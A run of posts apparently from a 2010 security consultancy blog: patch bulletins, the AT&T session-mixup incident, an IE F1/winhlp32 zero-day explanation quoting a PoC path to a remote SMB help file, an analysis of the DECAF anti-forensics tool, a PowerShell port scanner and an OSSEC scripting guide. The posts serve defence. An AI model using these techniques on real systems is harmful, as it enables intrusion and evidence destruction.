Users are reporting issues trying to reserve the ability to purchase (pre-order) the latest iPhone 4 on June 24th, when they go on sale, caused by what is basically a complete overwhelming of the systems designed to take the orders. AT&T’s web interface at brick and mortar shops is failing to the point where orders are being taken with pen and paper, and the Apple web site is acting clunky. But the most serious issue people are reporting is that upon logging into AT&T online to place the order, another user’s information is coming up.

AT&T eventually just disabled online access for its users. Gizmodo received these messages from their readership amongst around 8 complaints:

From: Eric Paul Mertens
Date: Tue, Jun 15, 2010 at 11:19 AM
Subject: AT&T iphone pre-order wrong account

This morning while trying to pre-order the iPhone 4 through AT&T website, my login brought me to a ‘website 
unavailable' screen. After a refresh it brought me to the phone upgrade page logged in under a different 
account, 

some dude from Lakewood OH!

From: Michael
Date: Tue, Jun 15, 2010 at 11:09 AM
Subject: AT&T security breach

Hello,

I am not sure if this e-mail is going to the correct place but this morning when trying to log in to my at&t 
account I entered my information and ended up in someone else's account with access to all their information. 
I feel as though someone could now be logged in to my account. To me, this seems like a huge security 
breach and at&t is shrugging me off as if it is no big deal and I feel that it is. I just thought with the
recent i-pad breach that this one is an even bigger one and I wanted to bring it to your attention.

Thanks,
Michael Staropoli

And one user was kind enough to provide a screenshot to drive home the point.

From: john king
Date: Tue, Jun 15, 2010 at 2:04 PM
Subject: ATT WEBSITE LOGS ME IN AS ANOTHER CUSTOMER
To: tips@gizmodo.com

I LOGGED IN AS ME AND IT BROUGHT UP A MARY ???? BIG PROBLEM
-JPK

AT&T user finds that he's a Mary.

System Upgrade?

Gizmodo received a report from a 3rd party put forth that an untested (in their opinion) system change is probably responsible for these issues.

I work at a 3rd party order processing facility—what AT&T refers to as a 3CC. We process business-to-business, business-to-customer Wireline Indirect, and ACME/PAC (what AT&T calls their iPhone program internally). Agents use AT&T programs called Phoenix, Telegence, Compass, Ordertrack and myCSP to process orders.

You might want to advise people to not get the upgrade at this point as it may be a doorway to a major privacy breach.

This analysis is thin and speculative at best. It seems to be focused on B2B platforms, whereas the problems are reported in the retail web site. It is possible to have a problem introduced this way, but theoretically it would probably be more wide spread.

Nah…

So if we look at this, without any other information, how do we decide that one user logging in and seeing another user’s information is probably not the result of a weekend systems’ upgrade? Because we’ve seen this behavior before, a lot. When you stress test a web site, its not uncommon to see functions that return and read user sessions get garbled, and web sites start to return pages for the wrong user session.

U.S. productivity grinds to a stand still.

When you log into a web site a session gets created and some sort of persistence mechanism is returned to maintain the session (usually a session cookie, but there are other less used methods available). Every “logged in page” reads this session identifier to determine whether the user is logged in and uses it to return the right information. Further complexity is usually introduced into large web sites, where some sort of load balancing is taking place, and therefore a user’s session has to be found amongst data centers, servers, and so forth.

As Christian points out below, one example is that session cookies are sometimes made unique based on a time stamp which in many sites will only go down to milliseconds. Thus when a site receives too many concurrent requests, it starts issuing duplicate session cookies.

When you overload the capacity of programs that read, manage, and create sessions, bad stuff happens like sessions getting crossed. Since the AT&T site was probably under a severe and unusually high server load today, the site went haywire (in our technical opinion).

How do you prevent this from happening? Add occasional and event driven stress testing to your quality assurance processes, you will find a number of unusual and difficult to solve problems result. At the very least you will know how your web application acts under unusually high loads, and thus not be surprised when the Apple fanboys come calling for Steve’s latest masterpiece.

Related Posts:

• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010
• Regular or Decaf? Tool launched to combat COFEE

Microsoft Updates

ID: MS10-030
Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code Execution
Microsoft Severity: Critical

Summary: A vulnerability exists in Outlook Express and Window Mail caused by an insufficient validation of network data before using the data to calculate the necessary size of a buffer. An attacker can exploit the vulnerability by tricking a user to initiate a connection to a malicious POP or IMAP server.

Praetorian’s Recommendation: The critical severity is due to the potential for remote code execution, however their are a few key points here to mitigate the severity. First, the mail clients affected are Outlook Express and Windows Mail, Office Outlook is not affected. Second, the client must initiate a connection to a malicious server. In an corporate or enterprise environment, the egress points should restrict outbound POP and IMAP, or the desktop environment should restrict the server settings from being modified.

ID: MS10-031
Title: Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution
Microsoft Severity: Critical

Summary: A vulnerability exists in Visual Basic for applications which can lead to remote code execution. An attacker can create a malicious Office file (Word, Excel) which exploits the VBA vulnerability.

Praetorian’s Recommendation: A user would need to open a malicious file to be expoited, therefore, continued emphasis on user training on handling email attachments and web content is necessary. Prepare this update for your next MS Office patch cycle.

Related Posts:

• iPhone 4 Ordering and Session Switching
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010
• Regular or Decaf? Tool launched to combat COFEE

Today is patch Tuesday for March 2010, and Microsoft has released two security bulletins for this round of updates, neither of which are deemed critical. The second bulletin addresses seven different vulnerabilities across various versions of Microsoft Office Excel.

ID: MS10-016
Title: Vulnerabilities in in Windows Movie Maker Could Allow Remote Code Execution
Microsoft Severity: Important

Summary: There is a buffer overflow in the Windows Movie Maker and MS Producer 2003 which can lead to code execution. Movie Maker 2.1 is included with Windows XP SP2 and SP3, and Movie Maker 6.0 is included with Vista. Movie Maker 2.6 is an optional download for Vista and Windows 7.

Praetorian’s Recommendation: This is deemed important instead of critical due to the user having to run content which exploits the vulnerability. A user would have to be tricked into opening a Movie Maker project file (mswmm) to be exploited. This can be updated in your next patch cycle, and is not considered urgent.

ID: MS10-017
Title: Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
Microsoft Severity: Important

Summary: This update addresses seven different vulnerabilities related to Microsoft Office Excel. Each vulnerability may affect one or more of the following versions: Office Excel 2003 SP3, Office Excel 2003 SP3, Office Excel 2007 SP1 and SP2, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Office Excel Viewer SP1 and SP2, Office Compatibility Pack for Word, Excel, and Powerpoint 2007 File Formats SP1 and SP2, and Office SharePoint Server 2007 SP1 and SP2.

Praetorian’s Recommendation: Although the same requirement exists as MS10-016 for users to open malicious files, Excel formats are more recognizable and phishing and social engineering techniques can be more successful with a known or common file format. This can be updated in your next patch cycle, but should warrant more attention than MS10-017.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• Press F1 for Help, pwned.
• February’s Patch Tuesday
• Using Group Policy to Disable JavaScript in Adobe PDF Files

Microsoft published security advisory 981169 yesterday in response to the zero day vulnerability reported a few days prior. The vulnerability is in the help system and can be triggered by luring an Internet Explorer user into pressing the F1 key. Windows 2000, Windows XP SP2 & SP3, and Windows 2003 SP2 with Internet Explorer 7 and Internet Explorer 8 are all affected.

Credit to Maurycy Prodeus for publishing the initial details of the vulnerability.

Details

Using the MsgBox VBScript function in an html file, an attacker can create a dialog box prompting the user to hit F1, something that is likely not difficult to do with a message such as “Internet Explorer encountered an error, press F1 to continue”. The MsgBox function is important as its fourth argument specifies a helpfile parameter, basically which hlp or chm file to launch when the user asks for help via F1.

I created a simple help file with the word “Test” using the Microsoft Help Workshop version 4.03. In addition to this, I added the macro to launch a command prompt (cmd.exe). When I double click this file in Windows XP SP3, I get my test helpfile and the command prompt launches as well:

Cmd.exe launched with my Help file.

So we now have a .hlp file which executes code. As mentioned before, the MsgBox function has a parameter to specify a help file to launch when the user hits F1. Here is where I come back to a recurring issue of SMB traffic and allowing it outbound on firewalls. In order for the MsgBox parameter to launch the .hlp file, the attacker must point to a local file (which the user would have had to already download) or host a file on an internet accessible SMB share. If you look at the proof of concept code circulating, currently you will see the MsgBox help parameter is “\x.x.x.x\attackfile.hlp”, a pointer to a help file on an SMB share. Corporate enterprises should certainly block SMB outbound, and with this vulnerability and the several previous attacks via SMB client, users should be blocking this outbound traffic as well.

Vista, Windows 7, & Server 2008

The vulnerability does not work on Vista, Windows 7 and Windows 2008 due to Microsoft no longer including winhlp32.exe with these versions. However, there is an update which can install winhlp32 for these versions (Windows 7 Version I installed from here). I found that these updates did not launch the cmd.exe as the Windows XP version did (I also tried Prodeus’s PoC help file and it displayed but did not run calc.exe). It is possible that Microsoft removed this code execution function from these versions.

Workarounds

The warnings are avoid hitting F1 when prompted by websites. Additionally, permissions to winhlp32.exe can be modified so that it doesn’t execute. In an Active Directory environment, a Group Policy software restriction setting can prohibit winhlp32.exe from launching. As mentioned, I recommend blocking outbound SMB traffic, as there is rarely a justification for mounting a network share on the public internet. This helps with many known vulnerabilities disclosed in the past as well.

Related Posts:

• Turning an ATM into a Slot Machine
• iPhone 4 Ordering and Session Switching
• Thou Shalt Not Send Naked Pictures…To Anyone Ever
• May’s Patch Tuesday
• IEPeers – A New Internet Explorer Zero Day Vulnerability

Severity Levels

Microsoft has a rating system for bulletins which includes: Critical, Important, Moderate, and Low; Adobe follows this same rating scale. The severity levels I provide differ from Microsoft’s in that I ascertain real world scenarios. For example, MS will give an important rating when exploitation could result in compromise of availability, as in a denial of service. MS09-069 can result in a denial of service, however, the attacker must already be authenticated. For this reason I drop the severity to Low.

Microsoft Updates

A quiet patch Tuesday for Microsoft, only one bulletin exists for this month, which is marked critical only for the Windows 2000 operating system whose support is due to expire in July of this year.

Bulletin: MS10-001 – Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (972270) Recommended Action: Update Windows 2000 SP4.

My Severity Rating: Critical for Windows 2000, Low for Windows XP, Server 2003, Windows Vista, Server 2008 and Windows 7.

Information: An issue exists in the way that the Microsoft Windows Embedded OpenType (EOT) Font Engine decompresses specially crafted EOT fonts. An attacker can send a malicious Word or Powerpoint document containing a specially crafted Embedded OpenType (EOT) font which the victim would have to open, allowing the attacker to gain remote code execution.

Note:

Microsoft announced in a blog post that the SMB bug which can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe halt to the OS, however, Microsoft stated that they “are not aware of any active attacks using the exploit code” and are still working on an update.

Adobe Updates

Another busy month for Adobe. We’ve seen various malware circulating the internet using the vulnerabilities found in the Util.printd, Util.Printf, Collab.getIcon and Collab.collectEmailInfo functions. Today, an update is to be released patching the vulnerability in the Doc.media.newPlayer method in Adobe Reader which was exploited in December.

Bulletin: APSB10-02 Vulnerability in the Doc.media.newPlayer method in Adobe Reader 9.2 and Acrobat 9.2, and Adobe Reader 8.1.7 and Acrobat 8.1.7

Recommended Action: PDF’s currently are a popular vector for spreading malware and trojan downloaders. The recommended action is to update as soon as possible.

My Severity Rating: Critical.

Information: The update addresses the following issues:

• An unspecified memory corruption error in the Doc.media.newPlayer method can allow a remote attacker to execute arbitrary code on the system. CVE-2009-4324

• An array boundary issue in U3D support that could lead to code execution.

• A DLL-loading vulnerability in 3D that could allow arbitrary code execution.

• A memory corruption vulnerability that could lead to code execution.

• A script injection vulnerability by changing the Enhanced Security default.

• A null-pointer dereference vulnerability that could lead to denial of service.

• A buffer overflow vulnerability in the Download Manager that could lead to code execution.

• An integer overflow vulnerability in U3D support that could lead to code execution.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• Regular or Decaf? Tool launched to combat COFEE

About a month ago, there was much news about the release of COFEE into the torrent wild. I even gave my two cents about the much hyped forensics toolkit which is provided to law enforcement for the purposes of easily capturing volatile data from personal computers during evidence collection. A tool to counter COFEE, aptly named DECAF, has been released as an anti-forensics tool to prevent the use of COFEE for data collection.

“We want to promote a healthy unrestricted free flow of internet traffic and show why law enforcement should not solely rely on Microsoft to automate their intelligent evidence finding,” one of the two hackers behind Decaf told The Register in explaining the objective of the project.

DECAF Details

DECAF is written in Visual Basic 2005 and consists of a single executable and an XML configuration file called decaf.exe.config which contains the application settings (an XML is also created in the user’s profile directory for each user’s specific settings).

When launched, it displays the user license agreement and asks for confirmation. When agreed, it writes the following registry entry:

Key: HKU\SOFTWARE\DECAFme
Value: AcceptedEULA
Data: true

The program then connects via HTTP to 208.68.237.165 to check the current version number and receives the following response: 1.0.0|http://www.decafme.org/|

If the application does not have a network connection, it will crash upon starting up with the following event:

EventType clr20r3, P1 decaf.exe, P2 1.0.2.0, P3 4b2679b7, P4 decaf,
 P5 1.0.2.0, P6 4b2679b7, P7 115, P8 14d, P9 
system.invalidoperationexception, P10 NIL.

Decaf Menu

I produced this initially when I had my virtual host’s network interface disabled.

Starting the monitor puts the application in detection mode, looking for the presence of COFEE. It waits for the launch of runner.exe, the launcher in COFEE, and will perform an action based on the configuration settings. It appears the tool checks the MD5 hash of runner.exe (ab9e68c7e71ebb2d6a5b8d17e9bd6b33). In addition to detecting the launch of runner.exe, the tool performs a WMI query to detect the COFEE USB thumb drive. The WMI query used for this type of action is:

SELECT * FROM __InstanceOperationEvent WITHIN 10 WHERE TargetInstance ISA "Win32_DiskDrive"

And since the thumb drive has the COFEE label, finding its presence should not be an issue.

Notification finding COFEE

When COFEE is found, a notification is sent over to decafme.org (note I changed the rip field to invalid IP addresses):

GET /decaf.php?&rip=299.297.141.45&rtime=12142009_050704PM-5&sim=false HTTP/1.1

When clicking Simulate, it mimics what would happen if coffee is found, and the sim field is set to true:

GET /decaf.php?&rip=299.297.141.45&rtime=12142009_051522PM-5&sim=true HTTP/1.1

The Configuration Menu

Lockdown Settings

In the configuration menu, there are checkboxes in the Monitor section to “Monitor USB” and “Monitor COFEE”. As discussed, these options enable checking for runner.exe and detection of the USB thumb drive. The Notification section contains options for notifying the user when detection occurs. The Actions section is the interesting part, especially editing the Lockdown Mode. Here, you can set what happens when detection occurs. Some of the options are:

• Shutdown the system
• Kill selected processes
• Disable Network, USB, CD-ROM, ports, floppy
• Clear event viewer
• Erase Data

The configuration settings are stored per user in an XML file located in:

%USERPROFILE%\local settings\application data\DECAFme.org\Decaf.exe_Url_5fokqfogt1qso5vyeabunvhsigozqvpo\1.0.2.0>

If the config for the user does not exist, the default in the launch directory is used.

Conclusion

When I first heard of the tool, I assumed it would also include detection of the default OS commands and Sysinternal utilities that COFEE typically runs, such as pslist.exe or tcpvcon.exe, however, in its current version this is not the case. An anti-forensics tool which expands into detecting the typical collection tools will affect investigations that use various toolkits (Helix, IRCR, etc), not just COFEE. However, as quoted by The Register, the DECAF brewer’s intentions are not to derail just any collection suite, but for law enforcement to expand beyond using what Microsoft provides them.

This version of decaf is still very bitter and has quite a ways to go in its development. The authors of Decaf are promising a more light-weight version or a windows service in the next release and text message and email triggers to enter lockdown mode remotely in future versions. However, Decaf provides a good example of how anti-forensic tools continue to evolve and can become serious roadblocks for digital forensic investigators.

Updates

The authors of Decaf have shut down the project and have said they are starting a forum for those interested in further discussing related matters. Considered a spoof, stunt, hoax, and many other names in the media, we have discussed the matter in the following post.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• WinPE 3.0 & Forensics
• March’s Patch Tuesday
• Press F1 for Help, pwned.

• MS09-071 – Vulnerabilities in Internet Authentication Service Could Allow Remote Code Execution (974318)
• MS09-074 – Vulnerability in Microsoft Office Project Could Allow Remote Code Execution (967183)
• MS09-072 – Cumulative Security Update for Internet Explorer (976325)
• MS09-069 – Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (974392)
• MS09-070 – Vulnerabilities in Active Directory Federation Services Could Allow Remote Code Execution (971726)
• MS09-073 – Vulnerability in WordPad and Office Text Converters Could Allow Remote Code Execution (975539)

Severity Levels

Microsoft has a rating system for bulletins which includes: Critical, Important, Moderate, and Low. The severity levels I provide below are not directly from Microsoft. For example, MS will give an important rating when exploitation could result in compromise of availability, as in a denial of service. MS09-069 can result in a denial of service, however, the attacker must already be authenticated. For this reason I drop the severity to Low.

Bulletin Summaries

Bulletin: MS09-071
Recommended Action: Update Windows 2008 Server (32-bit and 64-bit) which have IAS configured to use PEAP with MS-CHAP v2 authentication.
My Severity Rating: Moderate, should patch the above mentioned software.

This update addresses two vulnerabilities in the Internet Authentication Service (IAS). One is an IAS memory corruption vulnerability and the second is an authentication bypass vulnerability in MS-CHAP authentication. Client operating systems contain the vulnerable code but the components are not used in a way to make them vulnerable.

Bulletin: MS09-074
Recommended Action: Update MS Project 2000 SR-1.
My Severity Rating: Important for Project Software

This update addresses a vulnerability in Microsoft Project which can cause remote code execution when a specially crafted Project file is opened.  Microsoft Project 2000 SR-1, Project 2002 SP1 and Project 2003 SP3 are affected.

Bulletin: MS09-074
Recommended Action: Update Internet Explorer
My Severity Rating Critical

This update addresses five difference vulnerabilities with at least one or more affected every version of Internet Explorer. Attackers can host malicious code which can lead remote code execution on vulnerable systems. Any issues that lead to remote execution in IE should be addressed immediately; even if you are confident about not browsing malicious sites, a known site, such as the Pentagon web site, could be used to automatically execute or redirect you to malicious code using cross-site scripting.

Bulletin: MS09-069
Recommended Action: Update Windows 2000, Windows XP and Windows 2003
My Severity Rating: Low

A vulnerability in LSASS can cause a denial of service. The attacker must be authenticated and communicating through IPSEC.

Bulletin: MS09-070
Recommended Action: Update Windows 2003 and Windows 2008 Servers
My Severity Rating: Low

This update addresses two vulnerabilities in Active Directory Federation Services, one which can be used to spoof an authenticated user and the second which can cause remote code execution. The spoofing requires access to a workstation and browser recently used by a targeted user and the remote code execution requires the attacker to have valid logon credentials to the vulnerable server.

Bulletin: MS09-069
Recommended Action: Update Windows XP SP3 and/or Office 2003 SP3
My Severity Rating: Moderate

A vulnerability in text converters in WordPad and Office can cause remote code execution. Malicious code can be hosted on a website to trigger an exploit, however, an attempt would cause a dialog box to appear prompting the user to open the file (unless the option to “Always ask before opening this type of file” has been unchecked).

Adobe

Adobe has mirrored the patch Tuesday schedule of releasing patches on the first Tuesday of the month. The severity ratings also follow the same definitions a s Microsoft’s.

Adobe has two advisories for this month:

Bulletin: APSA09-06
Recommended Action: Update Adobe Illustrator CS4 and earlier. (Avail Jan 8)
My Severity Rating: Low

A vulnerability in Illustrator CS4 and earlier could lead to remote code execution. The target is required to open a malicious eps file.

Bulletin: APSA09-17
Recommended Action: Update Adobe Flash Player and Adobe AIR
My Severity Rating: Low

Adobe states this is a critical update and it is scheduled for release today, but does not provide details of the update.

Updates

Adobe has released details on the Flash Player update. The update addresses six vulnerabilities, five which can lead to remote execution and one to information disclosure. The vulnerabilities were identified in Flash Player version 10.0.32.18 and earlier.

References

• Microsoft’s December Bulletins
• Adobe’s Security Advisories

Related Posts:

• Turning an ATM into a Slot Machine
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

Adobe’s implementation of Javascript in PDF documents, referred to as Acrobat JavaScript, appears to have been originally introduced based on the popularity of PDF eForms. Javascript allows for some dynamic behaviors in PDF’s, including calculations, responses to user actions, user data validation, and the integration of other dynamic capabilities.

That said, for many users PDF’s are simply a mechanism for providing documents to read. Given the spate of vulnerabilities identified in Acrobat and Reader in 2009, and the likely promise of more in 2010, we are releasing by request this general instruction for disabling Javascript in Adobe Acrobat. An advisable approach, depending on your usage of these products, may be to disable Javascript and only re-enable when performing an activity with a PDF that requires Javascript be enabled, such as with an eForm.

Adobe notes that disabling Javascript mitigates against exploits identified this year that use Javascript functions to cause a memory corruption, although in some cases it would be possible to create variants that do not rely on Javascript. To disable Javascript in Adobe Reader or Acrobat: select Edit > Preferences, select the JavaScript option on the left, and uncheck the Enable Acrobat JavaScript option as shown.

Uncheck to disable Acrobat JavaScript

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

It’s been a while since my last post regarding Powershell which showed how to scan hosts for network interfaces in promiscuous mode. This time around, we’ll scan for some well known ports in our Active Directory to see who has a local IIS or SQL Express running on their machine. I know what you’re thinking. A port scanner? I already use trusty old NMAP or Superscan. This is not about port scanning, its about Powershell. In the last post, we used the MSNdis_CurrentPackFilter class of WMI to find any network cards in promiscuous mode, using Active Directory computer objects as our targets. Once again, I keep the AD query of computer objects as a way to source target hosts, but the scripts can easily be modified to take in a hosts file or an IP range. For making connections, let’s look into the System.Net.Sockets class.

When I started looking into a method I can use to establish a connection to a given port in order to check if it was open, I went with a Connect method using the System.Net.Sockets.Socket class. This isn’t what I ended up using in the finished script, but I want to mention this class, because it can be used to send data to a connected socket, or to receive data on a listening socket (there is a listen method as well). Perhaps a more detailed post will materialize on those items, but I haven’t thought of a reason to use them yet. Maybe we can convert Gaffie’s Python code that crashes Windows 7 into a Powershell script one day.

Why didn’t I end up using the socket.connect method? The timeout was too long and I lost patience fiddling with the ConnectAsync method. If interested, here is the code for the socket.connect:

$computer = “test”
$ipport = [int]80
$comp = [Net.Dns]::GetHostEntry($computer)
foreach ($ip in $comp.AddressList) {
   $ep = New-Object System.Net.IPEndPoint($ip, $ipport)
   $socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,
                                                  [System.Net.Sockets.SocketType]::Stream,
                                                  [System.Net.Sockets.ProtocolType]::Tcp)
   $optlevel = [System.Net.Sockets.SocketOptionLevel]::"Socket"
   $optname = [System.Net.Sockets.SocketOptionName]::"SendTimeout"
   $timeout = [Int]100
   $socket.SetSocketOption($optlevel,$optname,$timeout)
   $socket.Connect($ep)
   $socket.Close()

I’ve left out the AD code and the extra code that’s in the port scan script to show just the use of socket.connect. The workstation in the script is “test” and we’re trying to connect to port 80. If the host is using a firewall that will actively refuse the connection, we get a quick response which would be fine for a port scanner; but, if the port is simply not listening and there is no firewall to actively refuse the connection, there is a pretty significant delay before getting the connection error. This delay is not suitable for port scanning.

Instead of System.Net.Sockets.Socket, we will use the System.Net.Sockets.TcpClient class with the BeginConnect Method in conjunction with a timeout (if it doesn’t complete in a given time, we assume the connection is not available). I’ve seen examples of this used on poshcode.org for testing a connection to port 135 prior to making WMI calls or other RPC calls.

$HostEntry = [Net.Dns]::GetHostEntry($CompName)
foreach ($ip in $HostEntry.AddressList) {
   Write-Host "Checking: $CompName on $ip"
   foreach ($tcpport in $PortList) {
      $TCPclient = new-Object system.Net.Sockets.TcpClient
      $Connection = $TCPclient.BeginConnect($ip,$tcpport,$null,$null)
      $TimeOut = $Connection.AsyncWaitHandle.WaitOne(3000,$false)  ## 3 second timeout can be modified
    if(!$TimeOut)   {
       $TCPclient.Close()
       Write-Host "     OK: Port $tcpport is closed."
       }
    else {
       try {
          $TCPclient.EndConnect($Connection) | out-Null
          $TCPclient.Close()
          ## Next line outputs that the port is closed. I prefer to see output 
          ## processing; comment for outputting only open ports.
          Write-Host "     " -nonewline
          Write-Host "Host: $CompName has port $tcpport open!" -foregroundcolor red -backgroundcolor yellow
          } 
       catch {
          ## Machine actively refused the connection. The port is not open but $TimeOut was still true
          ## Uncomment next line to output the error for this.
          ## write-host $_
         write-host "     OK: Port $tcpport is closed."
       }

Note: the script requires a parameter
which is comma separated list of ports.

Example: ad-portscan.ps1 23,80,443,1433

You can see by the code snippet above that we are using Sockets.TcpClient rather than Sockets.Socket, and the method used is BeginConnect rather than Connect as in the previous example. If the connection is not available in 3 seconds, the timeout is expired and the script reports the port is closed. In some cases, Windows firewall will refuse the connection while the timeout is not expired. I found in these cases, when attempting to close the connection, an error reported that the connection was refused and was never connected to begin with. This is where the TRY / CATCH comes in, as we check that we can cleanly close the open connection, which will then report that the port is open.

You can find the full script here, and while by no means is this to replace your standard port scanner, it can provide a quick way to scan your AD hosts for open ports that you specify or get you digging further into Sockets.Socket which can lead to many places.

Note: the script requires a parameter which is comma separated list of ports.

Example: ad-portscan.ps1 23,80,443,1433

• http://msdn.microsoft.com/en-us/library/system.net.sockets.aspx

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Table of Contents

• Agentless Scripts

  • Periodic diff Specification
  • Periodic Specification
• Agentless Script: ssh_integrity_check_linux

• Our own Agentless Script: ssh_dmz_linux

  • Finding all setuid and setgid files
  • Finding all authentication and applications specific files
  • Merging finds
  • Creating ssh_dmz_linux
  • Testing

Agentless Scripts

All scripts that work with OSSEC agentless security monitoring use stdout for communication and reporting to the OSSEC server. This makes writing scripts for OSSEC simple as you do not need to do anything more then print or echo to stdout. The format of the output does need to meet the OSSEC specification, but that is a very simple thing to do.

Before we move to the specification details I need to explain that OSSEC agentless runs to different types of scripts. Namely the following:

Periodic diff Specification

The output for periodic_diff is very simple, any and all output after the agentless command “STORE: now” and before the next OSSEC Command will be stored and compared for differences. This type of script is mostly used for hardware devices such as Cisco IOS, Juniper JunOS, and other products.

Scripts that use the periodic_diff make use of the following commands:

Here is an example of a periodic_diff script that comes with OSSEC. (Please note with all agentless scripts you must be in the root of the OSSEC install for them to function correctly.)

obsd46#( cd /var/ossec && ./agentless/ssh_pixconfig_diff cisco@172.17.0.1 'show hardware' )
spawn ssh -c des cisco@172.17.0.1
No valid ciphers for protocol version 2 given, using defaults.
Password: 

a.zfw.tss>INFO: Starting.
enable
Password: 
a.zfw.tss#ok on enable pass

STORE: now
no pager
             ^
% Invalid input detected at '^' marker.

a.zfw.tss#term len 0
a.zfw.tss#terminal pager 0
                     ^
% Invalid input detected at '^' marker.

a.zfw.tss#show version | grep -v Configuration last| up
                         ^
% Invalid input detected at '^' marker.

a.zfw.tss#show running-config
Building configuration...


Current configuration : 14631 bytes
!
version 12.4

[................SNIP CONFIG.................]

a.zfw.tss#show hardware
Cisco IOS Software, 3800 Software (C3845-ADVENTERPRISEK9-M), Version 12.4(24)T1, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Fri 19-Jun-09 19:21 by prod_rel_team

ROM: System Bootstrap, Version 12.3(11r)T2, RELEASE SOFTWARE (fc1)

a.zfw.tss uptime is 1 week, 5 days, 7 hours, 29 minutes
System returned to ROM by reload at 13:34:26 UTC Thu Oct 22 2009
System image file is "flash:c3845-adventerprisek9-mz.124-24.T1.bin"


This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.

A summary of U.S. laws governing Cisco cryptographic products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by sending email to
export@cisco.com.

Cisco 3845 (revision 1.0) with 1007615K/40960K bytes of memory.
Processor board ID FTX1043A2CR
2 Gigabit Ethernet interfaces
1 ATM interface
1 Virtual Private Network (VPN) Module
4 CEM T1/E1 ports
DRAM configuration is 64 bits wide with parity enabled.
479K bytes of NVRAM.
492015K bytes of USB Flash usbflash0 (Read/Write)
62720K bytes of ATA System CompactFlash (Read/Write)

Configuration register is 0x2102


a.zfw.tss#exit
Connection to 172.17.0.1 closed by remote host.
Connection to 172.17.0.1 closed.

INFO: Finished.

In this example above the script would store the contents between “STORE: now” and “INFO: Finished.“. If this is the first time that OSSEC agentless has run this command no alerts would be generated and the contents would have been saved for later comparisons. If OSSEC agentless has a stored copy from a previous execution it will compare the files and if there are any differences it will generate an alert.

Periodic Specification

The periodic specification has more options and gives more control to the script writer on what actions OSSEC will take. Once again stdout is used for communication so script writing is easy.

Example of real FWD: command.

FWD: 19419:600:0:0:fb30de5b02029950ae05885a3d407c8c:017cd6118cdc166ee8eba8af1b7fdad6763203d3 ./.bash_history

The Fields break down in to the following

Using this format OSSEC can store the information about a file and then in the future run compare that they are the same. If for some reason they are not the same an alert will be generated. Here is an example of a password change on a linux system:

OSSEC HIDS Notification.
2009 Sep 21 15:19:00

Received From: (ssh_integrity_check_linux) root@172.17.20.20->syscheck
Rule: 550 fired (level 7) -> "Integrity checksum changed."
Portion of the log(s):

Integrity checksum changed for: '/etc/shadow'
Old md5sum was: '0d92e12c92f3edcf9d8876ea57c5f677'
New md5sum is : '2bd51b61dea17c5682fb2c0cf4f92c63'
Old sha1sum was: '2270c03a920ef8dd50e11cefdef046a8660f7a29'
New sha1sum is : 'd9518ea9022b10d07f81925c6d7f2abb4364b548'

--END OF NOTIFICATION

Agentless Script: ssh_integrity_check_linux

Now that we have an understanding of how agentless scripts communicate with the parent OSSEC preocess, let’s move on to a working example. The OSSEC supplied script ssh_integrity_check_linux is a great place to start, so lets open it up and see what is going on.

obsd46# cat /var/ossec/agentless/ssh_integrity_check_linux
 #!/usr/bin/env expect

 # @(#) $Id: ssh_integrity_check_linux,v 1.11 2009/06/24 17:06:21 dcid Exp $
 # Agentless monitoring
 #
 # Copyright (C) 2009 Trend Micro Inc.
 # All rights reserved.
 #
 # This program is a free software; you can redistribute it
 # and/or modify it under the terms of the GNU General Public
 # License (version 3) as published by the FSF - Free Software
 # Foundation.


 # Main script.
source "agentless/main.exp"


 # SSHing to the box and passing the directories to check.
if [catch {
    spawn ssh $hostname
} loc_error] {
    send_user "ERROR: Opening connection: $loc_error.\n"
    exit 1;
}


source $sshsrc
source $susrc

set timeout 600
send "echo \"INFO: Starting.\"; for i in `find $args 2>/dev/null`;do tail \$i >/dev/null 2>&1 && 
md5=`md5sum \$i | cut -d \" \" -f 1` && sha1=`sha1sum \$i | cut -d \" \" -f
 1` && echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"

expect {
    timeout {
        send_user "ERROR: Timeout while running commands on host: $hostname .\n"
        exit 1;
    }
    eof {
        send_user "\nINFO: Finished.\n"
        exit 0;
    }
}

exit 0;

The comments in the script hints to what is going on, but everything up to and including set timeout 600 is related to setting up the expect functions and code for handling the ssh subprocess and connecting to the remote host. I am not going to spend any time with this section, I am just going to make use of it.

The meat of what is getting processed on the remote end all happens in two lines.

send "echo \"INFO: Starting.\"; for i in `find $args 2>/dev/null`;do tail \$i >/dev/null 2>&1 && 
md5=`md5sum \$i | cut -d \" \" -f 1` && sha1=`sha1sum \$i | cut -d \" \" -f
